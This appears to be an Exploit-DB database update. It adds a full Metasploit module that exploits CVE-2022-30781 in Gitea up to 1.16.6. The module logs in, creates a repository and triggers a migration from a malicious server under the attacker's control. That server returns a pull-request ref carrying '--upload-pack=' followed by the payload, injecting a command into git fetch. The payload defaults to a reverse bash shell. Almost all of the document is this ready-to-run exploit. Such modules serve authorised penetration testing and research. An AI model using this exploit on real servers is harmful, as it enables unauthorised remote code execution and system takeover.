DB: 2022-09-16

1 changes to exploits/shellcodes

Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)

exploits/multiple/webapps/51009.rb

@@ -0,0 +1,274 @@
+# Exploit Title: Gitea Git Fetch Remote Code Execution
+# Date: 09/14/2022
+# Exploit Author: samguy
+# Vendor Homepage: https://gitea.io
+# Software Link: https://dl.gitea.io/gitea/1.16.6
+# Version: <= 1.16.6
+# Tested on: Linux - Debian
+# Ref : https://tttang.com/archive/1607/
+# CVE : CVE-2022-30781
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gitea Git Fetch Remote Code Execution',
+        'Description' => %q{
+          This module exploits Git fetch command in Gitea repository migration
+          process that leads to a remote command execution on the system.
+          This vulnerability affect Gitea before 1.16.7 version.
+        },
+        'Author' => [
+          'wuhan005 & li4n0', # Original PoC
+          'krastanoel'        # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2022-30781'],
+          ['URL', 'https://tttang.com/archive/1607/']
+        ],
+        'DisclosureDate' => '2022-05-16',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix win],
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(3000),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'Password to use']),
+      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/user/login'),
+      'keep_cookies' => true
+    )
+    return CheckCode::Unknown('No response from the web service') if res.nil?
+    return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    # Powered by Gitea Version: 1.16.6
+    unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))
+      return CheckCode::Unknown('Target does not appear to be running Gitea.')
+    end
+
+    if match[:version].match(/[a-zA-Z]/)
+      return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/user/login'),
+      'vars_post' => {
+        'user_name' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        '_csrf' => get_csrf(res.get_cookies)
+      },
+      'keep_cookies' => true
+    )
+    return CheckCode::Safe('Authentication failed') if res&.code != 302
+
+    if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')
+      return CheckCode::Appears("Version detected: #{match[:version]}")
+    end
+
+    CheckCode::Safe("Version detected: #{match[:version]}")
+  rescue ::Rex::ConnectionError
+    return CheckCode::Unknown('Could not connect to the web service')
+  end
+
+  def primer
+    ['/api/v1/version', '/api/v1/settings/api',
+     "/api/v1/repos/#{@migrate_repo_path}",
+     "/api/v1/repos/#{@migrate_repo_path}/pulls",
+     "/api/v1/repos/#{@migrate_repo_path}/topics"
+    ].each { |uri| hardcoded_uripath(uri) } # adding resources
+
+    vprint_status("Creating repository \"#{@repo_name}\"")
+    gitea_create_repo
+    vprint_good('Repository created')
+    vprint_status("Migrating repository")
+    gitea_migrate_repo
+  end
+
+  def exploit
+    @repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_name = rand_text_alphanumeric(6..15)
+    @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"
+    datastore['URIPATH'] = "/#{@migrate_repo_path}"
+
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+    [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }
+    cleanup # removing all resources
+  end
+
+  def get_csrf(cookies)
+    csrf = cookies&.split("; ")&.grep(/_csrf=/)&.join&.split("=")&.last
+    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf
+    csrf
+  end
+
+  def gitea_remove_repo(name)
+    vprint_status("Cleanup: removing repository \"#{name}\"")
+    uri = "/#{datastore['username']}/#{name}/settings"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, uri),
+      'keep_cookies' => true
+    )
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => {
+        'action' => 'delete',
+        'repo_name' => name,
+        '_csrf' => get_csrf(res.get_cookies)
+      },
+      'keep_cookies' => true
+    )
+    vprint_warning('Unable to remove repository') if res&.code != 302
+  end
+
+  def gitea_create_repo
+    uri = normalize_uri(target_uri.path, '/repo/create')
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)
+    @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text
+    fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => {
+        'uid' => @uid,
+        'auto_init' => 'on',
+        'readme' => 'Default',
+        'repo_name' => @repo_name,
+        'trust_model' => 'default',
+        'default_branch' => 'master',
+        '_csrf' => get_csrf(res.get_cookies)
+      },
+      'keep_cookies' => true
+    )
+    fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302
+
+  rescue ::Rex::ConnectionError
+    return CheckCode::Unknown('Could not connect to the web service')
+  end
+
+  def gitea_migrate_repo
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/repo/migrate'),
+      'keep_cookies' => true
+    )
+    uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text
+    fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri
+
+    svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, uri),
+      'keep_cookies' => true
+    )
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => {
+        'uid' => @uid,
+        'service' => svc_type,
+        'pull_requests' => 'on',
+        'repo_name' => @migrate_repo_name,
+        '_csrf' => get_csrf(res.get_cookies),
+        'auth_token' => rand_text_alphanumeric(6..15),
+        'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",
+      },
+      'keep_cookies' => true
+    )
+    if res&.code != 302 # possibly triggered by the [migrations] settings
+      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text
+      gitea_remove_repo(@repo_name)
+      cleanup
+      fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")
+    end
+
+  rescue ::Rex::ConnectionError
+    return CheckCode::Unknown('Could not connect to the web service')
+  end
+
+  def on_request_uri(cli, req)
+    case req.uri
+    when '/api/v1/version'
+      send_response(cli, '{"version": "1.16.6"}')
+    when '/api/v1/settings/api'
+      data = {
+        'max_response_items':50,'default_paging_num':30,
+        'default_git_trees_per_page':1000,'default_max_blob_size':10485760
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}"
+      data = {
+        "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",
+        "owner": { "login": datastore['username'] }
+      }
+      send_response(cli, data.to_json)
+    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
+      send_response(cli, '{"topics":[]}')
+    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
+      data = [
+        {
+          "base": {
+            "ref": "master",
+          },
+          "head": {
+            "ref": "--upload-pack=#{payload.encoded}",
+            "repo": {
+              "clone_url": "./",
+              "owner": { "login": "master" },
+            }
+          },
+          "updated_at": "2001-01-01T05:00:00+01:00",
+          "user": {}
+        }
+      ]
+      send_response(cli, data.to_json)
+    end
+  end
+end

files_exploits.csv

@@ -45070,3 +45070,4 @@ id,file,description,date,author,type,platform,port
 51006,exploits/hardware/webapps/51006.txt,"Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,hardware,
 51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
 51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
+51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,